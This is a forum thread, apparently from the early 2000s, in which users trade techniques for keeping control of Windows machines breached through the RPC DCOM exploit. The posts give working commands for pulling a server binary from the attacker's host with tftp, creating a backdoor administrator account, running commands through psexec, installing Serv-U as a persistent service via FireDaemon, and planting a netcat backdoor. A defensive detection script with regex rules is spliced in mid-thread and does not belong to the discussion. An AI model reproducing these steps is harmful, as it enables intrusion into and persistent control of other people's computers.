Full Version: Dcom Cmd Executing
ssj4conejo
Well, I have been in some of my own machines that have the RPC DCOM exploit. Now is there a working DOS ftp or DOS trojan or something that lets me keep a machine after the DCOM doesn't work? I've tried adding servudaemon to the startup folder in the start menu... not working... Any help will be really appreciated on how you guys keep the comp. I think a DOS ftp would be a great idea but can't find one. Oh, by the way, when I try to run servudaemon from the command line, or almost any other server or trojan, it says the application must be run under Win32. Thank you.

FOR EDUCATIONAL PURPOSES ONLY.
flap
don't put servudaemon.exe in your startup folder.. it's useless

use the option servudaemon.exe /i (of course @ the command line)

(install servudaemon as service)

after this execute at the commandline:

net start serv-u

if everything went OK you can type:

net start (now you will see a list of all the installed services on that pc, including the servu service)

now servudaemon should be installed and running on the computer, reboot after reboot after reboot

greetz flapz000r
muttley
Hi all, I'm new in this forum,
and I want to share my experience with the RPC DCOM Vulnerability.

I've seen that you succeeded in transferring files to/from the victim computer.
How do you do this?

I've found the Universal Exploit,
coded by OC192 Group, and it works with my Italian version.

There are some points I'd like to verify:

I can't execute any useful program.
When I try to open an ftp location from the hacked computer (both the computers are my property) it asks me for a userid and then it doesn't ask me anything anymore.
The only thing I can do is break the connection with CTRL-X and CTRL-C.
At that point, it is impossible to use the exploit until the victim computer is rebooted.

Now, for me and for my little knowledge it is impossible to transfer files.
Can someone tell me something more?
thanks ALL.
ssj4conejo
muttley I have an easy solution for you: on your windoze box, INSTALL A TFTP SERVER = ), and just follow the instructions. The most popular one is the one made by Solar Winds or something like that, just install it and run it, then when in someone else's command line this is the command...


tftp -i ipaddress get filename destinationfilename
for example
tftp -i 69.69.69.69 get pr0n.exe pr0n.exe

that is one way. Now people say you can also use raw ftp commands or a file to do all the commands, but I haven't tried that, and the regular ftp kept freezing on me after typing in my username too.
andariel
yeah, as ssj4conejo said, tftp is the way to go. The Solar Winds tftp server is around 7 MB and has a simple GUI and is efficient. tftp is just ftp implemented on UDP, so there is no three-way handshake.
and remember to upload a backdoor before anything else. Use netcat with the -l switch for that. enjoy
rc-p90
yes, with universal.exe and Solar Winds tftp I can transfer files from and to the computer!
But I haven't found a way to execute a program on the hacked machine (only if I put it in the start menu autorun folder, but that's a bit lame, because it has to reboot first).
Someone knows a way? Please?
T3cHn0b0y
The first thing you should always do (in case you disconnect from the remote shell) is create an admin user. Type:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>net user [username] [password] /add

C:\WINNT\System32>net localgroup administrators [username] /add

-----------------------------------------------------------------------------------------------

After doing this type "net start" and see if Terminal Services is listed. If it is and the port has not been blocked by the firewall, then use remote desktop connection to connect to the computer with the [username] and [password] you supplied earlier. SIMPLE! It's as if you bought a new PC a couple of hundred miles away from you. If you get in then you "WILL" be able to execute servudaemon.exe!!!

If, however, the port is blocked then don't worry because there's always psexec to execute commands if you lose the shell. Download psexec from www.psutils.com and you can execute commands on the remote host like this:

-----------------------------------------------------------------------------------------------

C:\Windows\System32>psexec -u [username] -p [password] [command]

for example, if I created a user "Admin" with the password "12345" then another hacker would be able to hack this computer with IPC Scan. HAHA. OK, don't pick a stupid password, but for argument's sake, the command to open an interactive shell would be:

C:\Windows\System32>psexec -u Admin -p 12345 CMD

now for every line you would be typing in the remote shell do this:

C:\Windows\System32>psexec -u Admin -p 12345 "tftp -i 11.22.33.44 get servudaemon.exe"

C:\Windows\System32>psexec -u Admin -p 12345 "servudaemon /i"

etc.

-----------------------------------------------------------------------------------------------

Apart from all this to get back into the computer, to start the servu server after using the /i switch is:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>net start "serv-u ftp server"

-----------------------------------------------------------------------------------------------

If you cannot install Serv-U as a system service with the "/i" parameter then use FireDaemon. Upload it to the server's system32 dir along with the servudaemon executable and ini and type these commands:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>set MXHOME=%WINDIR%\System32

C:\WINNT\System32>set MXBIN=%MXHOME%

C:\WINNT\System32>firedaemon -i Serv-U "C:\WINNT\System32" "C:\WINNT\System32\ServUDaemon.exe" Y 0 0 0 Y

C:\WINNT\System32>net start Serv-U

-----------------------------------------------------------------------------------------------

Now, even if the computer (somehow - maybe if you amazingly managed to hack it whilst started up in dos) isn't running a win32 operating system, as soon as windows does start up, so will the serv-u ftp server.
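From the defender's side, the sequence this post walks through (net user /add, net localgroup administrators /add, tftp -i ... get, psexec -u/-p, firedaemon -i, servudaemon /i) is exactly what process-creation telemetry should flag, especially when it runs under SYSTEM. The Python below is an added example, not code from the thread; the "user<TAB>command line" record format and the sample records are constructed assumptions.

```python
import re
from typing import List, Tuple

# Detection rules keyed to the commands discussed in this thread.
# Each entry: (rule name, compiled regex applied to a process command line).
RULES: List[Tuple[str, re.Pattern]] = [
    ("local-account-created",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added-to-administrators",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("tftp-binary-download",
     re.compile(r"\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("psexec-remote-exec",
     re.compile(r"\bpsexec(?:\.exe)?\b.*\s-[up]\s", re.I)),
    ("service-install-via-firedaemon",
     re.compile(r"\bfiredaemon(?:\.exe)?\s+-i\b", re.I)),
    ("servu-service-install",
     re.compile(r"\bservudaemon(?:\.exe)?\s+/i\b", re.I)),
]

def scan_command_line(cmdline: str) -> List[str]:
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Scan 'user<TAB>command line' records; return (line no, user, rules) per hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        user, _, cmd = line.partition("\t")
        matched = scan_command_line(cmd)
        if matched:
            hits.append((n, user, matched))
    return hits

# Constructed sample records (not real telemetry), mirroring the thread's commands.
SAMPLE_LOG = [
    "NT AUTHORITY\\SYSTEM\tnet user Admin 12345 /add",
    "NT AUTHORITY\\SYSTEM\tnet localgroup administrators Admin /add",
    "NT AUTHORITY\\SYSTEM\ttftp -i 11.22.33.44 get servudaemon.exe",
    "HOST\\Admin\tpsexec -u Admin -p 12345 CMD",
    "HOST\\Admin\tfiredaemon -i Serv-U \"C:\\WINNT\\System32\" \"C:\\WINNT\\System32\\ServUDaemon.exe\" Y 0 0 0 Y",
    "HOST\\alice\tnet user",                    # benign: only lists accounts
    "HOST\\alice\tnotepad.exe C:\\notes.txt",   # benign
]

if __name__ == "__main__":
    for n, user, rules in scan_log(SAMPLE_LOG):
        print(f"record {n} ({user}): {', '.join(rules)}")
```

The two benign records show the rules need the /add switch or the download/install verb, so routine "net user" listings do not alert.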
transeunte
Hey T3cHn0b0y, that's cool!

Do u think psexec can be run on computers without admin privileges - such as in a cybercafe or something like that?

Thanks for the info, m8!
flap
dude............................... wake up!!!
... and get a grip on yourself
netcomm
flap

I've been reading a lot of your posts around the place and just let me say I don't like you.

You do nothing but bitnote yourself. People like you piss me off.
You're a know-everything, know-nothing kind of person.
I will personally make sure I don't help you whenever I can.

peace to all bar flap.
NetComm
TuT
OK, this all works on an NT box,
but if u try it on an XP box
what do I have to do then?

CODE

set MXHOME=%windir%\System32
set MXBIN=%MXHOME%

C:\WINDOWS\System32\FireDaemon -i Serv-U "C:\WINDOWS\System32" "C:\WINDOWS\System32\Serv-U.exe" Y 0 0 0 Y

net start Serv-U


gives the following error:
The following file can not be found
while everything is in that directory.. (Only on XP. It works on 2k (I've put it in a .bat file))

-TuTmAsTeR
Invision Power Board © 2001-2005 Invision Power Services, Inc.